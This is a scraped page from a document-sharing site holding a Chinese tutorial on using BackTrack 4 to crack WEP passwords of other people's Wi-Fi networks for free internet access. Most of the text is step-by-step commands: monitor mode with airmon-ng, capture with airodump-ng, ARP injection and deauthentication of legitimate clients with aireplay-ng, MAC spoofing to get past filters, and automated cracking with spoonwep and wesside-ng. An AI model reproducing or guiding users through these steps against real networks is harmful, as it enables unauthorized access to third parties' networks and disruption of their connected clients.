- 1、本文档共14页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
BT4使用教程
下载的BT4 解压,得到BOOT 和BT4 两个文件,放d 盘根目录下。将spoowep2.lzm
放到D:\BT4\modules 下,重启电脑,到dos 下。
输入: d: 回车
cd boot 回车
cd dos 回车
cd bt4 回车
输入: root 回车 toor 回车(注意屏幕上不显示字母,只管输)
startx 回车 (不要输入xconf,不然进不了bt4,这里跟bt3 不同)
打开用命令生成器生成的TXT 文件,打开一个窗口
复制、粘贴、执行 ifconfig –a
Wlan0 就是瑞银 执行: airmon-ng start wlan0 6
瑞银端口变为mon0
执行: ln -fs bash /bin/sh
执行: ls -al /bin/sh 有bash 成功
执行:spoonwep
第一个,网卡选mon0。 第二个选 normal 第三个选 unknown victim
点next
点launch,在右下角会出来spoonwep vict.scan,点击
回到上一个界面
有 √的为有客户端,破解起来比较容易
选择要破解的ESSID 后 ,点selection ok
第一个框选 fragmentation & forge attack 其他默认, 再选launchData 在涨,到1w5 左右,密码自动会跳出来。这个我以前用760n 破解过,就不继续
下去啦。
BT4无线上网破解教程
1.启动BT4,选1024x768图形模式,用户名root,密码toor(如果需要),执行startx进入桌面。注释说明:[] 可选回显/ 或者() 提示---------------------WEP---------------------------------------命令行窗口 1:----------------------1.ifconfig -awlan0 ... xx:xx:xx:xx:xx:xx[macchanger -m 00:11:22:33:44:55 wlan0修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入]2.ifconfig -a wlan0 up3.airmon-ng start wlan0 6monitor mode enabled on mon0(6是频道)另一说5100要支持注入用airmon-ng start wlan0如果这里回显(monitor mode enabled) 则下面命令所有端口号要用wlan0[aireplay-ng -9 mon0 / aireplay-ng --test mon0Injection is working/No anwser(注入攻击成功/不成功)(检测你的网卡是否支持注入)]4.airodump-ng -w pack -c 6 mon0/wlan0(pack是随便起的获取的ivs的保存文件的名字)另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0------------------命令行窗口2:---------------------一、有客户端:破解:abcd四种方式a.合法客户端产生大量有效的数据,能直接获得大量cap。收到10000以上data后,直接转命令行窗口3,破解密码b.合法客户端只能产生少量数据,就需要注入-3攻击加速产生大量数据。5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)Read 11542 packets got 12587 ARP ...,send 71524 packets ... 很多类似行c.合法客户端不在通信,注入模式不成功,用-0 冲突模式强制断开合法客户端和ap连接,使之重新连接,新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan06.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0(可能要另开窗)d.有客户端,并且客户端能产生有效arp 数据的另类破解方式输入modprobe –r iwl3945(加载网卡)输入modprobe ipwraw输入airmon-ng start wlan0 6现在,只要一个命令就搞定,输入:输入wesside-ng -i wlan0 -v 01
文档评论(0)